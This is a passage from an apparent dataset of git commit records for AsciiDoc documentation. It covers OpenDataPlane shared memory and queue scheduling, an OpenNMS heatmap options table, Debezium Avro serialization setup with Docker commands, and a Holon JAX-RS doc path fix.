The lookup function is particularly useful to allow an ODP application\nthat is divided into multiple processes to obtain the handle for the common\nresource.\n\n== Shared memory\n=== Allocating shared memory\nBlocks of shared memory can be created using the +odp_shm_reserve()+ API\ncall. The call expects a shared memory block name, a block size, an alignment\nrequirement, and optional flags as parameters. It returns an +odp_shm_t+\nhandle. The size and alignment requirement are given in bytes.\n\n.creating a block of shared memory\n[source,c]\n----\n#define ALIGNMENT 128\n#define BLKNAME \"shared_items\"\n\nodp_shm_t shm;\nuint32_t shm_flags = 0;\n\ntypedef struct {\n...\n} shared_data_t;\n\nshm = odp_shm_reserve(BLKNAME, sizeof(shared_data_t), ALIGNMENT, shm_flags);\n----\n\n=== Getting the shared memory block address\nThe returned odp_shm_t handle can then be used to retrieve the actual\naddress (in the caller's ODP thread virtual address space) of the created\nshared memory block.\n\n.getting the address of a shared memory block\n[source,c]\n----\nshared_data_t *shared_data;\nshared_data = odp_shm_addr(shm);\n----\n\nThe address returned by +odp_shm_addr()+ is valid only in the calling ODP\nthread's address space: odp_shm_t handles can be shared between ODP threads\nand remain valid in any of them, whereas the address returned by\n+odp_shm_addr(shm)+ may differ from one ODP thread to another (for the same\n'shm' block), and should therefore not be shared between ODP threads.\nFor instance, it would be correct to send a shm handle using IPC between two\nODP threads and let each of these threads do its own +odp_shm_addr()+ to\nget the block address. Directly sending the address returned by\n+odp_shm_addr()+ from one ODP thread to another could however fail\n(the address may be meaningless in the receiver's address space).\n\nThe address returned by +odp_shm_addr()+ is nevertheless guaranteed to be\naligned according to the alignment requirements provided at block creation\ntime, even if the call to +odp_shm_addr()+ is performed by a different ODP\nthread than the one which originally called +odp_shm_reserve()+.\n\nAll shared memory blocks are contiguous in any ODP thread addressing space:\nthe range 'address' to 'address'\\+'size' (where 'size' is the shared memory\nblock size, as provided in the +odp_shm_reserve()+ call) is readable and\nwritable and maps the shared memory block.
There is no fragmentation.\n\n=== Memory behaviour\nBy default ODP threads are assumed to behave as cache coherent systems:\nany change performed on a shared memory block is guaranteed to eventually\nbecome visible to other ODP threads sharing this memory block. (This\nbehaviour may be altered by flags to +odp_shm_reserve()+ in the future.)\nNevertheless, there is no implicit memory barrier associated with any action\non shared memory: *when* a change performed by one ODP thread becomes visible\nto another ODP thread is not defined, so an application using shared memory\nblocks has to use the memory barriers provided by ODP to guarantee shared data\nvalidity between ODP threads.\n\n=== Lookup by name\nAs mentioned, shared memory handles can be sent from one ODP thread to\nanother using any IPC mechanism, and then the block address retrieved.\nA simpler approach to get the shared memory block handle of an already created\nblock is to use the +odp_shm_lookup()+ API function call.\nThis nevertheless requires the calling ODP thread to provide the name of the\nshared memory block:\n+odp_shm_lookup()+ will return +ODP_SHM_INVALID+ if no shared memory block\nwith the provided name is known by ODP.\n\n.retrieving a block handle and address from another ODP thread\n[source,c]\n----\n#define BLKNAME \"shared_items\"\n\nodp_shm_t shm;\nshared_data_t *shared_data;\n\nshm = odp_shm_lookup(BLKNAME);\nif (shm != ODP_SHM_INVALID) {\n\tshared_data = odp_shm_addr(shm);\n\t...\n}\n----\n\n=== Freeing memory\nFreeing shared memory is performed using the +odp_shm_free()+ API call.\n+odp_shm_free()+ takes a single argument, the shared memory block handle.\nAny ODP thread is allowed to perform an +odp_shm_free()+ on a shared memory\nblock (i.e. the thread performing the +odp_shm_free()+ may be different\nfrom the thread which did the +odp_shm_reserve()+). Shared memory blocks should\nbe freed only once, and once freed, a shared memory block should no longer\nbe referenced by any ODP threads.\n\n.freeing a shared memory block\n[source,c]\n----\nif (odp_shm_free(shm) != 0) {\n\t...\/\/handle error\n}\n----\n\n=== Memory creation flags\nThe last argument to odp_shm_reserve() is a set of ORed flags.\nTwo flags are supported:\n\n==== ODP_SHM_PROC\nWhen this flag is given, the allocated shared memory will become visible\noutside ODP. Non-ODP threads (e.g. ordinary Linux processes or threads)\nwill be able to access the memory using native (non-ODP) OS calls such as\n'shm_open()' and 'mmap()' (on Linux).\nEach ODP implementation should provide a description of exactly how\nthis mapping is done on that specific platform.\n\n==== ODP_SHM_SW_ONLY\nThis flag tells ODP that the shared memory will be used by the ODP application\nsoftware only: no HW (such as DMA engines or other accelerators) will ever\ntry to access the memory. No other ODP call will be involved with this memory\n(as ODP calls could implicitly involve HW, depending on the ODP\nimplementation), except for +odp_shm_lookup()+ and +odp_shm_free()+.\nODP implementations may use this flag as a hint for performance optimization,\nor may simply ignore it.\n\n== Queues\nQueues are the fundamental event sequencing mechanism provided by ODP and all\nODP applications make use of them either explicitly or implicitly. Queues are\ncreated via the 'odp_queue_create()' API that returns a handle of type\n+odp_queue_t+ that is used to refer to this queue in all subsequent APIs that\nreference it.
Queues have one of two ODP-defined _types_, POLL, and SCHED that\ndetermine how they are used. POLL queues directly managed by the ODP\napplication while SCHED queues make use of the *ODP scheduler* to provide\nautomatic scalable dispatching and synchronization services.\n\n.Operations on POLL queues\n[source,c]\n----\nodp_queue_t poll_q1 = odp_queue_create(\"poll queue 1\", ODP_QUEUE_TYPE_POLL, NULL);\nodp_queue_t poll_q2 = odp_queue_create(\"poll queue 2\", ODP_QUEUE_TYPE_POLL, NULL);\n...\nodp_event_t ev = odp_queue_deq(poll_q1);\n...do something\nint rc = odp_queue_enq(poll_q2, ev);\n----\n\nThe key distinction is that dequeueing events from POLL queues is an\napplication responsibility while dequeueing events from SCHED queues is the\nresponsibility of the ODP scheduler.\n\n.Operations on SCHED queues\n[source,c]\n----\nodp_queue_param_t qp;\nodp_queue_param_init(&qp);\nodp_schedule_prio_t prio = ...;\nodp_schedule_group_t sched_group = ...;\nqp.sched.prio = prio;\nqp.sched.sync = ODP_SCHED_SYNC_[NONE|ATOMIC|ORDERED];\nqp.sched.group = sched_group;\nqp.lock_count = n; \/* Only relevant for ordered queues *\/\nodp_queue_t sched_q1 = odp_queue_create(\"sched queue 1\", ODP_QUEUE_TYPE_SCHED, &qp);\n\n...thread init processing\n\nwhile (1) {\n odp_event_t ev;\n odp_queue_t which_q;\n ev = odp_schedule(&which_q, <wait option>);\n ...process the event\n}\n----\n\nWith scheduled queues, events are sent to a queue, and the sender chooses\na queue based on the service it needs. The sender does not need to know\nwhich ODP thread (on which core) or hardware accelerator will process\nthe event, but all the events on a queue are eventually scheduled and processed.\n\nAs can be seen, SCHED queues have additional attributes that are specified at\nqueue create that control how the scheduler is to process events contained\non them. These include group, priority, and synchronization class.\n\n=== Scheduler Groups\nThe scheduler's dispatching job is to return the next event from the highest\npriority SCHED queue that the caller is eligible to receive events from.\nThis latter consideration is determined by the queues _scheduler group_, which\nis set at queue create time, and by the caller's _scheduler group mask_ that\nindicates which scheduler group(s) it belongs to. Scheduler groups are\nrepresented by handles of type +odp_scheduler_group_t+ and are created by\nthe *odp_scheduler_group_create()* API. A number of scheduler groups are\n_predefined_ by ODP. These include +ODP_SCHED_GROUP_ALL+ (all threads),\n+ODP_SCHED_GROUP_WORKER+ (all worker threads), and +ODP_SCHED_GROUP_CONTROL+\n(all control threads). The application is free to create additional scheduler\ngroups for its own purpose and threads can join or leave scheduler groups\nusing the *odp_scheduler_group_join()* and *odp_scheduler_group_leave()* APIs\n\n=== Scheduler Priority\nThe +prio+ field of the +odp_queue_param_t+ specifies the queue's scheduling\npriority, which is how queues within eligible scheduler groups are selected\nfor dispatch. Queues have a default scheduling priority of NORMAL but can be\nset to HIGHEST or LOWEST according to application needs.\n\n=== Scheduler Synchronization\nIn addition to its dispatching function, which provide automatic scalability to\nODP applications in many core environments, the other main function of the\nscheduler is to provide event synchronization services that greatly simplify\napplication programming in a parallel processing environment. 
A queue's\nSYNC mode determines how the scheduler handles the synchronization processing\nof multiple events originating from the same queue.\n\nThree types of queue scheduler synchronization area supported: Parallel,\nAtomic, and Ordered.\n\n==== Parallel Queues\nSCHED queues that specify a sync mode of ODP_SCHED_SYNC_NONE are unrestricted\nin how events are processed.\n\n.Parallel Queue Scheduling\nimage::parallel_queue.svg[align=\"center\"]\n\nAll events held on parallel queues are eligible to be scheduled simultaneously\nand any required synchronization between them is the responsibility of the\napplication. Events originating from parallel queues thus have the highest\nthroughput rate, however they also potentially involve the most work on the\npart of the application. In the Figure above, four threads are calling\n*odp_schedule()* to obtain events to process. The scheduler has assigned\nthree events from the first queue to three threads in parallel. The fourth\nthread is processing a single event from the third queue. The second queue\nmight either be empty, of lower priority, or not in a scheduler group matching\nany of the threads being serviced by the scheduler.\n\n=== Atomic Queues\nAtomic queues simplify event synchronization because only a single thread may\nprocess event(s) from a given atomic queue at a time. Events scheduled from\natomic queues thus can be processed lock free because the locking is being\ndone implicitly by the scheduler. Note that the caller may receive one or\nmore events from the same atomic queue if *odp_schedule_multi()* is used. In\nthis case these multiple events all share the same atomic scheduling context.\n\n.Atomic Queue Scheduling\nimage::atomic_queue.svg[align=\"center\"]\n\nIn this example, no matter how many events may be held in an atomic queue,\nonly one calling thread can receive scheduled events from it at a time. Here\ntwo threads process events from two different atomic queues. Note that there\nis no synchronization between different atomic queues, only between events\noriginating from the same atomic queue. The queue context associated with the\natomic queue is held until the next call to the scheduler or until the\napplication explicitly releases it via a call to\n*odp_schedule_release_atomic()*.\n\nNote that while atomic queues simplify programming, the serial nature of\natomic queues may impair scaling.\n\n=== Ordered Queues\nOrdered queues provide the best of both worlds by providing the inherent\nscalability of parallel queues, with the easy synchronization of atomic\nqueues.\n\n.Ordered Queue Scheduling\nimage::ordered_queue.svg[align=\"center\"]\n\nWhen scheduling events from an ordered queue, the scheduler dispatches multiple\nevents from the queue in parallel to different threads, however the scheduler\nalso ensures that the relative sequence of these events on output queues\nis identical to their sequence from their originating ordered queue.\n\nAs with atomic queues, the ordering guarantees associated with ordered queues\nrefer to events originating from the same queue, not for those originating on\ndifferent queues. Thus in this figure three thread are processing events 5, 3,\nand 4, respectively from the first ordered queue. Regardless of how these\nthreads complete processing, these events will appear in their original\nrelative order on their output queue.\n\n==== Order Preservation\nRelative order is preserved independent of whether events are being sent to\ndifferent output queues. 
For example, if some events are sent to output queue\nA while others are sent to output queue B then the events on these output\nqueues will still be in the same relative order as they were on their\noriginating queue. Similarly, if the processing consumes events so that no\noutput is issued for some of them (_e.g.,_ as part of IP fragment reassembly\nprocessing) then other events will still be correctly ordered with respect to\nthese sequence gaps. Finally, if multiple events are enqueued for a given\norder (_e.g.,_ as part of packet segmentation processing for MTU\nconsiderations), then each of these events will occupy the originator's\nsequence in the target output queue(s). In this case the relative order of these\nevents will be in the order that the thread issued *odp_queue_enq()* calls for\nthem.\n\nThe ordered context associated with the dispatch of an event from an ordered\nqueue lasts until the next scheduler call or until explicitly released by\nthe thread calling *odp_schedule_release_ordered()*. This call may be used\nas a performance advisory that the thread no longer requires ordering\nguarantees for the current context. As a result, any subsequent enqueues\nwithin the current scheduler context will be treated as if the thread was\noperating in a parallel queue context.\n\n==== Ordered Locking\nAnother powerful feature of the scheduler's handling of ordered queues is\n*ordered locks*. Each ordered queue has associated with it a number of ordered\nlocks as specified by the _lock_count_ parameter at queue create time.\n\nOrdered locks provide an efficient means to perform in-order sequential\nprocessing within an ordered context. For example, supposed events with relative\norder 5, 6, and 7 are executing in parallel by three different threads. An\nordered lock will enable these threads to synchronize such that they can\nperform some critical section in their originating queue order. The number of\nordered locks supported for each ordered queue is implementation dependent (and\nqueryable via the *odp_config_max_ordered_locks_per_queue()* API). If the\nimplementation supports multiple ordered locks then these may be used to\nprotect different ordered critical sections within a given ordered context.\n\n==== Summary: Ordered Queues\nTo see how these considerations fit together, consider the following code:\n\n.Processing with Ordered Queues\n[source,c]\n----\nvoid worker_thread()\n odp_init_local();\n ...other initialization processing\n\n while (1) {\n ev = odp_schedule(&which_q, ODP_SCHED_WAIT);\n ...process events in parallel\n odp_schedule_order_lock(0);\n ...critical section processed in order\n odp_schedule_order_unlock(0);\n ...continue processing in parallel\n odp_queue_enq(dest_q, ev);\n }\n}\n----\n\nThis represents a simplified structure for a typical worker thread operating\non ordered queues. Multiple events are processed in parallel and the use of\nordered queues ensures that they will be placed on +dest_q+ in the same order\nas they originated. While processing in parallel, the use of ordered locks\nenables critical sections to be processed in order within the overall parallel\nflow. When a thread arrives at the *odp_schedule_order_lock()* call, it waits\nuntil the locking order for this lock for all prior events has been resolved\nand then enters the critical section. 
The *odp_schedule_order_unlock()* call\nreleases the critical section and allows the next order to enter it.\n\n=== Queue Scheduling Summary\n\nNOTE: Both ordered and parallel queues improve throughput over atomic queues\ndue to parallel event processing, but require that the application take\nsteps to ensure context data synchronization if needed.\n\n== Cryptographic services\n\nODP provides support for cryptographic operations required by various security\nprotocols (e.g. IPSec). To apply a cryptographic operation to a packet a session\nmust be created first. Packets processed by a session share the same cryptographic\nparameters like algorithms, keys, initialization vectors. A session is created with\n*odp_crypto_session_create()* call. After session creation a cryptographic operation\ncan be applied to a packet using *odp_crypto_operation()* call.\nDepending on the session type - synchronous or asynchronous the operation returns\nwhen the operation completed or after the request has been submitted. In the\nasynchronous case an operation completion event will be enqueued on the session\ncompletion queue. The completion event conveys the status of the operation and\nthe result. The application has the responsibility to free the completion event.\nThe operation arguments specify for each packet the areas which are to be encrypted\nor decrypted and authenticated. Also, in asynchronous case a context can be\nassociated with a given operation and when the operation completion event is\nretrieved the associated context can be retrieved. An operation can be executed\nin-place, when the output packet is the same as the input packet or the output\npacket can be a new packet provided by the application or allocated by the\nimplementation from the session output pool.\n\ninclude::..\/glossary.adoc[]\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"7894d6eb6caf4a54d83cbd94a051aecfadb6424a","subject":"Added doc entry for the new option","message":"Added doc entry for the new option\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/webui\/heatmap\/introduction.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/webui\/heatmap\/introduction.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/..\/images\n=== Heatmap\n\nThe _Heatmap_ can be either be used to display unacknowledged alarms or to display ongoing outages\nof nodes. Each of this visualizations can be applied either on categories or on foreign sources of\nnodes. The sizing of an entity is calculated by counting the monitored services inside the entity.\nThus, a node with fewer services will appear in a smaller box than a node with more services.\n\nThe feature is by default deactivated and is configured through `opennms.properties`.\n\n.Heatmap visualizations of alarms\nimage:webui\/heatmap\/heatmap.png[]\n\n.Grafana Dashboard configuration properties\n[options=\"header, autowidth\"]\n|===\n| Name | Type | Description | Default\n| `org.opennms.heatmap.defaultMode` | _String_ | There exist two options for using the heatmap: `alarms` and\n `outages`. 
This option configures which are displayed per\n default.\n | `alarms`\n| `org.opennms.heatmap.defaultHeatmap` | _String_ | This option defines which _Heatmap_ is displayed by default.\n The two valid options are `categories` or `foreignSources` | `categories`\n| `org.opennms.heatmap.categoryFilter` | _String_ | The following option is used to filter for categories to be\n displayed in the _Heatmap_. This option uses the Java regular\n expression syntax. The default is `.*` so all categories will\n be displayed. | `.*`\n| `org.opennms.heatmap.foreignSourceFilter` | _String_ | The following option is used to filter for foreign sources\n to be displayed in the _Heatmap_. This option uses the Java\n regular expression syntax. The default is `.*` so all foreign\n sources will be displayed. | `.*`\n| `org.opennms.heatmap.onlyUnacknowledged` | _Boolean_ | This option configures whether only unacknowledged alarms\n will be taken into account when generating the alarm-based\n version of the _Heatmap_. | `false`\n| `org.opennms.web.console.centerUrl` | _String_ | You can also place the _Heatmap_ on the landing page by\n setting this option to `\/heatmap\/heatmap-box.jsp`. | `\/surveillance-box.jsp`\n|===\n\nTIP: You can use negative lookahead expressions for excluding categories you wish not to be displayed in the heatmap,\ne.g. by using an expression like `^(?!XY).*` you can filter out entities with names starting with `XY`.\n","old_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/..\/images\n=== Heatmap\n\nThe _Heatmap_ can be either be used to display unacknowledged alarms or to display ongoing outages\nof nodes. Each of this visualizations can be applied either on categories or on foreign sources of\nnodes. The sizing of an entity is calculated by counting the monitored services inside the entity.\nThus, a node with fewer services will appear in a smaller box than a node with more services.\n\nThe feature is by default deactivated and is configured through `opennms.properties`.\n\n.Heatmap visualizations of alarms\nimage:webui\/heatmap\/heatmap.png[]\n\n.Grafana Dashboard configuration properties\n[options=\"header, autowidth\"]\n|===\n| Name | Type | Description | Default\n| `org.opennms.heatmap.defaultMode` | _String_ | There exist two options for using the heatmap: `alarms` and\n `outages`. This option configures which are displayed per\n default.\n | `alarms`\n| `org.opennms.heatmap.defaultHeatmap` | _String_ | This option defines which _Heatmap_ is displayed by default.\n The two valid options are `categories` or `foreignSources` | `categories`\n| `org.opennms.heatmap.categoryFilter` | _String_ | The following option is used to filter for categories to be\n displayed in the _Heatmap_. This option uses the Java regular\n expression syntax. The default is `.*` so all categories will\n be displayed. | `.*`\n| `org.opennms.heatmap.foreignSourceFilter` | _String_ | The following option is used to filter for foreign sources\n to be displayed in the _Heatmap_. This option uses the Java\n regular expression syntax. The default is `.*` so all foreign\n sources will be displayed. | `.*`\n| `org.opennms.web.console.centerUrl` | _String_ | You can also place the _Heatmap_ on the landing page by\n setting this option to `\/heatmap\/heatmap-box.jsp`. | `\/surveillance-box.jsp`\n|===\n\nTIP: You can use negative lookahead expressions for excluding categories you wish not to be displayed in the heatmap,\ne.g. 
by using an expression like `^(?!XY).*` you can filter out entities with names starting with `XY`.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"6d1d500d0cecaeb718e2717c956bd22c7e97356a","subject":"DBZ-271 Switching to \"one sentence per line\" style to facilite diffs of later changes","message":"DBZ-271 Switching to \"one sentence per line\" style to facilite diffs of later changes\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/configuration\/avro.asciidoc","new_file":"docs\/configuration\/avro.asciidoc","new_contents":"= Avro Serialization\n:awestruct-layout: doc\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nDebezium connectors are used with the Kafka Connect framework to capture changes in databases and generate change events.\nThe Kafka Connect workers then apply to each of the messages generated by the connector the transformations configured for the connector,\nserialize each message key and value into a binary form using the worker's http:\/\/docs.confluent.io\/current\/connect\/concepts.html#connect-converters[_converters_],\nand finally write each messages into the correct Kafka topic.\n\nThe converters are specified in the the Kafka Connect worker configuration, and the same converters are used for all connectors deployed to that worker's cluster.\nKafka Connect comes with a _JSON converter_ that serialize the message keys and values into JSON documents,\nand the JSON converter can be configured to include or exclude the message schema using the (`key.converter.schemas.enable` and `value.converter.schemas.enable`) properties.\nOur link:\/docs\/tutorial[tutorial] shows what the messages look like when both payload and schemas are included, but the schemas make the messages very verbose.\nIf you want your messages serialized with JSON, consider setting these properties to `false` to exclude the verbose schema information.\n\nAnother option is to serialize the message keys and values using https:\/\/avro.apache.org\/[Apache Avro].\nThe Avro binary format is extremely compact and efficient, and Avro schemas make it possible to ensure that the messages have the correct structure.\nAvro's schema evolution mechanism makes it possible to evolve the schemas over time,\nwhich is essential for Debezium connectors that dynamically generate the message schemas to match the structure of the database tables.\nOver time, the change events captured by Debezium connectors and written by Kafka Connect into a topic may have different versions of the same schema,\nand Avro serialization makes it far easier for consumers to adapt to the changing schema.\n\nConfluent provides http:\/\/docs.confluent.io\/current\/schema-registry\/docs\/index.html[several components] that work with Avro:\n * An Avro Converter that can be used in Kafka Connect workers to map the Kafka Connect schemas into Avro schemas and to then use those Avro schemas to serialize the message keys and values into the very compact Avro binary form.\n * A Schema Registry that tracks all of the Avro schemas used in Kafka topics, and where the Avro Converter sends the generated Avro schemas.\n Since the Avro schemas are stored in this registry, each message need only include a tiny _schema identifier_.\n This makes each message even smaller, and for an I\/O bound system like Kafka this means more total throughput of the producers and consumers.\n * Avro _serdes_ (serializers and deserializers) for Kafka producers and 
consumers.\n Any Kafka consumer applications you write to consume change events can use the Avro serdes to deserialize the changes events.\n\nThese Confluent components are open source, and you can install them into any Kafka distribution and use them with Kafka Connect.\nHowever, Confluent also provides a https:\/\/www.confluent.io\/product\/confluent-open-source\/[Confluent Open Source Platform] that includes the standard Kafka distribution as well as these and other Confluent open source components, including several source and sink connectors.\nSome Docker images for Kafka Connect also contain the Avro converter. This includes recent link:\/docs\/docker\/[Debezium Docker images] that include the Debezium connectors, Kafka Connect, and the Avro converter.\n\n== Technical information\nA system that wants to use Avro serialization needs to complete two steps\n\n* Deploy a https:\/\/github.com\/confluentinc\/schema-registry[Schema Registry] instance\n* Use these properties to configure Apache Connect instance\n[source]\n----\nkey.converter=io.confluent.connect.avro.AvroConverter\nkey.converter.schema.registry.url=http:\/\/localhost:8081\nvalue.converter=io.confluent.connect.avro.AvroConverter\nvalue.converter.schema.registry.url=http:\/\/localhost:8081\n----\nNote: In addition to setting key\/value converters,it is *strongly recommended* to set internal key\/value converters to use JSON converters for easier analysis of stored configuration and offsets.\nIf you would still prefer to use Avro converter it is not possible now due to a https:\/\/issues.apache.org\/jira\/browse\/KAFKA-3988[known issue].\n[source]\n----\ninternal.key.converter=org.apache.kafka.connect.json.JsonConverter\ninternal.value.converter=org.apache.kafka.connect.json.JsonConverter\n----\n\n== Debezium Docker Images\nDeploy a Schema Registry instance\n[source]\n----\ndocker run -it --rm --name schema-registry \\\n --link zookeeper \\\n -e SCHEMA_REGISTRY_KAFKASTORE_CONNECTION_URL=zookeeper:2181 \\\n -e SCHEMA_REGISTRY_HOST_NAME=schema-registry \\\n -e SCHEMA_REGISTRY_LISTENERS=http:\/\/schema-registry:8081 \\\n -p 8181:8181 confluentinc\/cp-schema-registry\n----\nRun a Kafka Connect image configured to use Avro\n[source]\n----\ndocker run -it --rm --name connect \\\n --link zookeeper:zookeeper \\\n --link kafka:kafka \\\n --link mysql:mysql \\\n --link schema-registry:schema-registry \\\n -e GROUP_ID=1 \\\n -e CONFIG_STORAGE_TOPIC=my_connect_configs \\\n -e OFFSET_STORAGE_TOPIC=my_connect_offsets \\\n -e CONNECT_KEY_CONVERTER=io.confluent.connect.avro.AvroConverter \\\n -e CONNECT_VALUE_CONVERTER=io.confluent.connect.avro.AvroConverter \\\n -e CONNECT_INTERNAL_KEY_CONVERTER=org.apache.kafka.connect.json.JsonConverter \\\n -e CONNECT_INTERNAL_VALUE_CONVERTER=org.apache.kafka.connect.json.JsonConverter \\\n -e CONNECT_KEY_CONVERTER_SCHEMA_REGISTRY_URL=http:\/\/schema-registry:8081 \\\n -e CONNECT_VALUE_CONVERTER_SCHEMA_REGISTRY_URL=http:\/\/schema-registry:8081 \\\n -p 8083:8083 debezium\/connect:0.5\n----\n\n== Confluent Open Source\nPlease refer to http:\/\/docs.confluent.io\/current\/connect\/quickstart.html#goal-of-this-quickstart[a quickstart] in Confluent's documentation.\n","old_contents":"= Avro Serialization\n:awestruct-layout: doc\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nDebezium connectors are used with the Kafka Connect framework to capture changes in databases and generate change events. 
The Kafka Connect workers then apply to each of the messages generated by the connector the transformations configured for the connector, serialize each message key and value into a binary form using the worker's http:\/\/docs.confluent.io\/current\/connect\/concepts.html#connect-converters[_converters_], and finally write each messages into the correct Kafka topic.\n\nThe converters are specified in the the Kafka Connect worker configuration, and the same converters are used for all connectors deployed to that worker's cluster. Kafka Connect comes with a _JSON converter_ that serialize the message keys and values into JSON documents, and the JSON converter can be configured to include or exclude the message schema using the (`key.converter.schemas.enable` and `value.converter.schemas.enable`) properties. Our link:\/docs\/tutorial[tutorial] shows what the messages look like when both payload and schemas are included, but the schemas make the messages very verbose. If you want your messages serialized with JSON, consider setting these properties to `false` to exclude the verbose schema information.\n\nAnother option is to serialize the message keys and values using https:\/\/avro.apache.org\/[Apache Avro]. The Avro binary format is extremely compact and efficient, and Avro schemas make it possible to ensure that the messages have the correct structure. Avro's schema evolution mechanism makes it possible to evolve the schemas over time, which is essential for Debezium connectors that dynamically generate the message schemas to match the structure of the database tables. Over time, the change events captured by Debezium connectors and written by Kafka Connect into a topic may have different versions of the same schema, and Avro serialization makes it far easier for consumers to adapt to the changing schema.\n\nConfluent provides http:\/\/docs.confluent.io\/current\/schema-registry\/docs\/index.html[several components] that work with Avro:\n * An Avro Converter that can be used in Kafka Connect workers to map the Kafka Connect schemas into Avro schemas and to then use those Avro schemas to serialize the message keys and values into the very compact Avro binary form.\n * A Schema Registry that tracks all of the Avro schemas used in Kafka topics, and where the Avro Converter sends the generated Avro schemas. Since the Avro schemas are stored in this registry, each message need only include a tiny _schema identifier_. This makes each message even smaller, and for an I\/O bound system like Kafka this means more total throughput of the producers and consumers.\n * Avro _serdes_ (serializers and deserializers) for Kafka producers and consumers. Any Kafka consumer applications you write to consume change events can use the Avro serdes to deserialize the changes events.\n\nThese Confluent components are open source, and you can install them into any Kafka distribution and use them with Kafka Connect. However, Confluent also provides a https:\/\/www.confluent.io\/product\/confluent-open-source\/[Confluent Open Source Platform] that includes the standard Kafka distribution as well as these and other Confluent open source components, including several source and sink connectors. Some Docker images for Kafka Connect also contain the Avro converter. 
This includes recent link:\/docs\/docker\/[Debezium Docker images] that include the Debezium connectors, Kafka Connect, and the Avro converter.\n\n== Technical information\nA system that wants to use Avro serialization needs to complete two steps\n\n* Deploy a https:\/\/github.com\/confluentinc\/schema-registry[Schema Registry] instance\n* Use these properties to configure Apache Connect instance\n[source]\n----\nkey.converter=io.confluent.connect.avro.AvroConverter\nkey.converter.schema.registry.url=http:\/\/localhost:8081\nvalue.converter=io.confluent.connect.avro.AvroConverter\nvalue.converter.schema.registry.url=http:\/\/localhost:8081\n----\nNote: In addition to setting key\/value converters,it is *strongly recommended* to set internal key\/value converters to use JSON converters for easier analysis of stored configuration and offsets. If you would still prefer to use Avro converter it is not possible now due to a https:\/\/issues.apache.org\/jira\/browse\/KAFKA-3988[known issue].\n[source]\n----\ninternal.key.converter=org.apache.kafka.connect.json.JsonConverter\ninternal.value.converter=org.apache.kafka.connect.json.JsonConverter\n----\n\n== Debezium Docker Images\nDeploy a Schema Registry instance\n[source]\n----\ndocker run -it --rm --name schema-registry \\\n --link zookeeper \\\n -e SCHEMA_REGISTRY_KAFKASTORE_CONNECTION_URL=zookeeper:2181 \\\n -e SCHEMA_REGISTRY_HOST_NAME=schema-registry \\\n -e SCHEMA_REGISTRY_LISTENERS=http:\/\/schema-registry:8081 \\\n -p 8181:8181 confluentinc\/cp-schema-registry\n----\nRun a Kafka Connect image configured to use Avro\n[source]\n----\ndocker run -it --rm --name connect \\\n --link zookeeper:zookeeper \\\n --link kafka:kafka \\\n --link mysql:mysql \\\n --link schema-registry:schema-registry \\\n -e GROUP_ID=1 \\\n -e CONFIG_STORAGE_TOPIC=my_connect_configs \\\n -e OFFSET_STORAGE_TOPIC=my_connect_offsets \\\n -e CONNECT_KEY_CONVERTER=io.confluent.connect.avro.AvroConverter \\\n -e CONNECT_VALUE_CONVERTER=io.confluent.connect.avro.AvroConverter \\\n -e CONNECT_INTERNAL_KEY_CONVERTER=org.apache.kafka.connect.json.JsonConverter \\\n -e CONNECT_INTERNAL_VALUE_CONVERTER=org.apache.kafka.connect.json.JsonConverter \\\n -e CONNECT_KEY_CONVERTER_SCHEMA_REGISTRY_URL=http:\/\/schema-registry:8081 \\\n -e CONNECT_VALUE_CONVERTER_SCHEMA_REGISTRY_URL=http:\/\/schema-registry:8081 \\\n -p 8083:8083 debezium\/connect:0.5\n----\n\n== Confluent Open Source\nPlease refer to http:\/\/docs.confluent.io\/current\/connect\/quickstart.html#goal-of-this-quickstart[a quickstart] in Confluent's documentation.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9a69311810a9061ba29d3c81148e86b04027df0","subject":"Fix api location","message":"Fix api location","repos":"holon-platform\/holon-jaxrs","old_file":"documentation\/src\/docs\/asciidoc\/reference\/holon-jaxrs.adoc","new_file":"documentation\/src\/docs\/asciidoc\/reference\/holon-jaxrs.adoc","new_contents":"= Holon JAX-RS integration\r\n:revnumber: {project-version}\r\n:apidir: ..\/api\/holon-jax-rs\r\n:linkattrs:\r\n:sectnums:\r\n:nofooter:\r\n:toc: left\r\n:toclevels: 3\r\n\r\nCopyright \u00a9 2016-2017\r\n\r\n_Copies of this document may be made for your own use and for distribution to others, provided that you do not charge any fee for such copies and further provided that each copy contains this Copyright Notice, whether distributed in print or electronically._\r\n\r\n== Introduction\r\n\r\nThe introduction goes here.\r\n\r\n\r\n== System requirements\r\n\r\n=== Java\r\n\r\nThe 
Holon Platform core module requires https:\/\/www.java.com[Java] *8* or higher.\r\n","old_contents":"= Holon JAX-RS integration\r\n:revnumber: {project-version}\r\n:apidir: ..\/..\/api\/holon-jax-rs\r\n:linkattrs:\r\n:sectnums:\r\n:nofooter:\r\n:toc: left\r\n:toclevels: 3\r\n\r\nCopyright \u00a9 2016-2017\r\n\r\n_Copies of this document may be made for your own use and for distribution to others, provided that you do not charge any fee for such copies and further provided that each copy contains this Copyright Notice, whether distributed in print or electronically._\r\n\r\n== Introduction\r\n\r\nThe introduction goes here.\r\n\r\n\r\n== System requirements\r\n\r\n=== Java\r\n\r\nThe Holon Platform core module requires https:\/\/www.java.com[Java] *8* or higher.\r\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"326963503eda3f6a16e6e7075576b6f8fa73d49c","subject":"added documentation about the new sack merge operator. I'm still not happy with this work. I need to figure out a way of saying 'no bulk'... once that is straightened out I will fix up this area of documentation.","message":"added documentation about the new sack merge operator. I'm still not happy with this work. I need to figure out a way of saying 'no bulk'... once that is straightened out I will fix up this area of 